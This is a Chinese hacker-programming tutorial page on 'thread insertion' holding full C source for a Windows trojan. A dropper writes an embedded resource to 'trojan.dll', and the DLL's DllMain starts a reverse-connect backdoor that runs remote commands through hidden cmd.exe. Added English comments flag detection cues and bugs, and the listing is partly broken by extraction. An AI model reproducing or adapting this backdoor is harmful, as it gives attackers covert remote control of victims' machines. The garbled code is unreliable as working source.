  • 黑客编程教程(十六)线程插入技术

    //  resource.h
    
    // Resource type / resource ID pair under which the payload DLL is embedded
    // in the dropper executable.  WriteResourceToFile() below passes both to
    // FindResource() via MAKEINTRESOURCE.  256 is outside the predefined RT_*
    // range, i.e. a custom (application-defined) resource type.
    #define RC_BINARYTYPE 256
    
    #define ID_MAGICDEL_DLL 100
    
     
    
    DLL文件:
    
     
    
    #include <windows.h>
    
    #include<stdio.h>
    
    #include "resource.h"
    
     
    
    // Dropper helper: locates the binary resource (ID_MAGICDEL_DLL of type
    // RC_BINARYTYPE) embedded in the running executable's own image and writes
    // its raw bytes to `filename`, overwriting any existing file.
    //
    // None of the Win32 calls below are checked: a missing resource, a NULL
    // hResInfo/hgRes/pvRes, a failed CreateFile or a short WriteFile are all
    // silently ignored.
    //
    // NOTE(review): the page labels this listing "DLL文件" (DLL file), but it
    // defines main() — presumably it is the loader EXE that carries the DLL as
    // a resource, and the two labels on the page are swapped; confirm.
    //
    // Defender note: a process that reads a resource out of its own module
    // (GetModuleHandle(NULL)) and writes it straight to disk with CREATE_ALWAYS
    // is the classic "resource drop" stage; the file creation is the event to
    // look for.
    void WriteResourceToFile(char const *filename)
    
    {
    
     
    
    HINSTANCE hInstance=GetModuleHandle(NULL);  // module handle of the calling EXE itself
    
        
    
        HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
    
                                      MAKEINTRESOURCE(RC_BINARYTYPE));
    
        HGLOBAL hgRes = LoadResource(hInstance, hResInfo);   // not checked for NULL
    
        void *pvRes = LockResource(hgRes);                   // pointer into the mapped image
    
        DWORD cbRes = SizeofResource(hInstance, hResInfo);   // byte length of the payload
    
     
    
        
    
        // Destination file: write-only, no sharing, always truncated/recreated.
        HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
    
                                  FILE_ATTRIBUTE_NORMAL, 0);
    
        DWORD cbWritten;
    
        WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);   // cbWritten is never compared to cbRes
    
        CloseHandle(hFile);
    
    }
    
     
    
     
    
    // Dropper entry point: unpacks the embedded resource to "trojan.dll" in the
    // process's current working directory and exits.  The DLL is only written
    // here, not loaded or injected; the hard-coded file name is the artifact
    // this stage leaves on disk.
    int main(void)
    
    {
    
        WriteResourceToFile("trojan.dll");
    
    return 0;
    
    }
    
     
    
    主程序:
    
     
    
    #include<winsock2.h>
    
    #include<stdio.h>
    
    // Link Winsock 2 and kernel32 via linker directives (MSVC-specific pragma).
    #pragma comment(lib,"ws2_32.lib")
    
    #pragma comment(lib, "kernel32.lib")
    
    int StartSocket(); // reverse-connect worker; DllMain runs it on its own thread
    
    // DLL entry point (the page's comment: "equivalent of main()").
    // On DLL_PROCESS_ATTACH it immediately spawns a thread running StartSocket
    // and returns TRUE so the load succeeds; every other reason code is a
    // no-op.  StartSocket is declared `int StartSocket()` and cast to
    // LPTHREAD_START_ROUTINE, so the cast hides a signature mismatch with the
    // thread-routine prototype.
    //
    // Defender note: a DLL whose DllMain creates a network thread at attach
    // time is the behaviour to key on — the load of this module (by whatever
    // loader the article's "thread insertion" step uses, not shown here) is
    // followed at once by an outbound connection from the host process.
    BOOL APIENTRY DllMain( HANDLE hModule, 
    
                           DWORD  ul_reason_for_call, 
    
                           LPVOID lpReserved
    
    )   // DLL entry point, the equivalent of main()
    
    {
    
    switch(ul_reason_for_call)
    
        {
    
          case DLL_PROCESS_ATTACH: 
    
           {
    
               // Thread handle is never closed; only the thread id is kept.
               DWORD id;           CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id);
    
               break;
    
           }
    
          default:
    
      break;
    
        }
    
      return TRUE;
    
    }
    
    // Reverse-connect command shell, run on the thread created in DllMain.
    //
    // Behaviour as written: initialise Winsock, open a TCP connection to the
    // hard-coded address 127.0.0.1:80 (a placeholder for the operator's host),
    // send a banner, then loop forever: receive one line, prepend
    // "<system dir>\cmd.exe /c", run it hidden with stdout/stderr redirected
    // into an anonymous pipe, and stream the pipe contents back over the
    // socket.  When recv() fails the whole host process is terminated with
    // exit(0).
    //
    // NOTE(review): the line breaks inside the string literals on this page
    // ("messages", the printf/send strings) look like page extraction of "\n"
    // escapes — as shown the listing does not compile.  Also note the bare
    // `return;` statements in a function declared `int`, and that the socket,
    // pipe handles and process handles are never closed.
    //
    // Defender notes (all visible in the code below):
    //  - outbound TCP to port 80 carrying a non-HTTP banner
    //    ("BackConnect BackDoor V0.1");
    //  - cmd.exe /c spawned repeatedly with SW_HIDE and
    //    STARTF_USESTDHANDLES, child stdout/stderr bound to a pipe;
    //  - the command line comes straight off the socket and is appended to a
    //    270-byte stack buffer with strncat(..., strlen(buf1)) — i.e. no bound
    //    on the destination's remaining capacity.
    int StartSocket()
    
    {
    
    // Banner sent once after connecting.
    char *messages = "
    ======================== BackConnect BackDoor V0.1 ========================
    ========= Welcome to Http://www.hackerxfiles.net =========
    "; 
    
    WSADATA WSAData;
    
    SOCKET sock;
    
    SOCKADDR_IN addr_in;
    
    char buf1[1024];   // receive buffer for socket data
    
    memset(buf1,0,1024);   // clear the buffer
    
     if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    
       {
    
         printf("WSAStartup error.Error:d
    ",WSAGetLastError());
    
         return;
    
       }
    
     
    
       addr_in.sin_family=AF_INET;
    
       addr_in.sin_port=htons(80);  // port on the remote host to connect back to
    
       addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  // remote IP
    
          if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    
       {
    
         printf("Socket failed.Error:d
    ",WSAGetLastError());
    
         return;
    
       }
    
       if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     // connect to the client host
    
       {
    
         printf("Connect failed.Error:d",WSAGetLastError());
    
         return;
    
       }
    
          if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)  // send the welcome banner
    
       {
    
            printf("Send failed.Error:d
    ",WSAGetLastError());
    
            return;
    
       }
    
       
    
    char buffer[2048] = {0};// data read back from the pipe
    
    // One iteration per received command; cmdline is zeroed at the end of each
    // iteration (and is uninitialised on the first one).
    for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
    
    SECURITY_ATTRIBUTES sa;// anonymous pipe used to capture cmd's output
    
    HANDLE hRead,hWrite;
    
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    
    sa.lpSecurityDescriptor = NULL;
    
    sa.bInheritHandle = TRUE;   // the write end must be inheritable by the child
    
    if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
    
    {
    
      printf("Error On CreatePipe()");
    
         return;
    
    } 
    
     
    
    STARTUPINFO si;
    
    PROCESS_INFORMATION pi; 
    
    si.cb = sizeof(STARTUPINFO);
    
    GetStartupInfo(&si); 
    
    // Child stdout/stderr go into the pipe; window is hidden.
    si.hStdError = hWrite;
    
    si.hStdOutput = hWrite;
    
    si.wShowWindow = SW_HIDE;
    
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    
     
    
    // Build "<system dir>\cmd.exe /c" — note the unescaped backslash as printed.
    GetSystemDirectory(cmdline,MAX_PATH+1);
    
    strcat(cmdline,"\cmd.exe /c");
    
     
    
    int   len=recv(sock,buf1,1024,NULL);
    
    if(len==SOCKET_ERROR)exit(0); // if the client disconnects, exit the (host) process
    
    if(len<=1){send(sock,"error
    ",sizeof("error
    "),0);continue;}
    
     
    
    strncat(cmdline,buf1,strlen(buf1)); // append the received command to cmdline
    
    if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
    
    {
    
     send(sock,"Error command
    ",sizeof("Error command
    "),0);
    
     continue;
    
    }
    
      
    
    // Close the parent's copy of the write end so ReadFile sees EOF when the
    // child exits.
    CloseHandle(hWrite);
    
    // Read the pipe in a loop and send each chunk until the pipe is drained.
    for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){  
    
    send(sock,buffer,strlen(buffer),0);   // sends up to the first NUL, not bytesRead
    
    }
    
         }
    
    return 0;
    
    }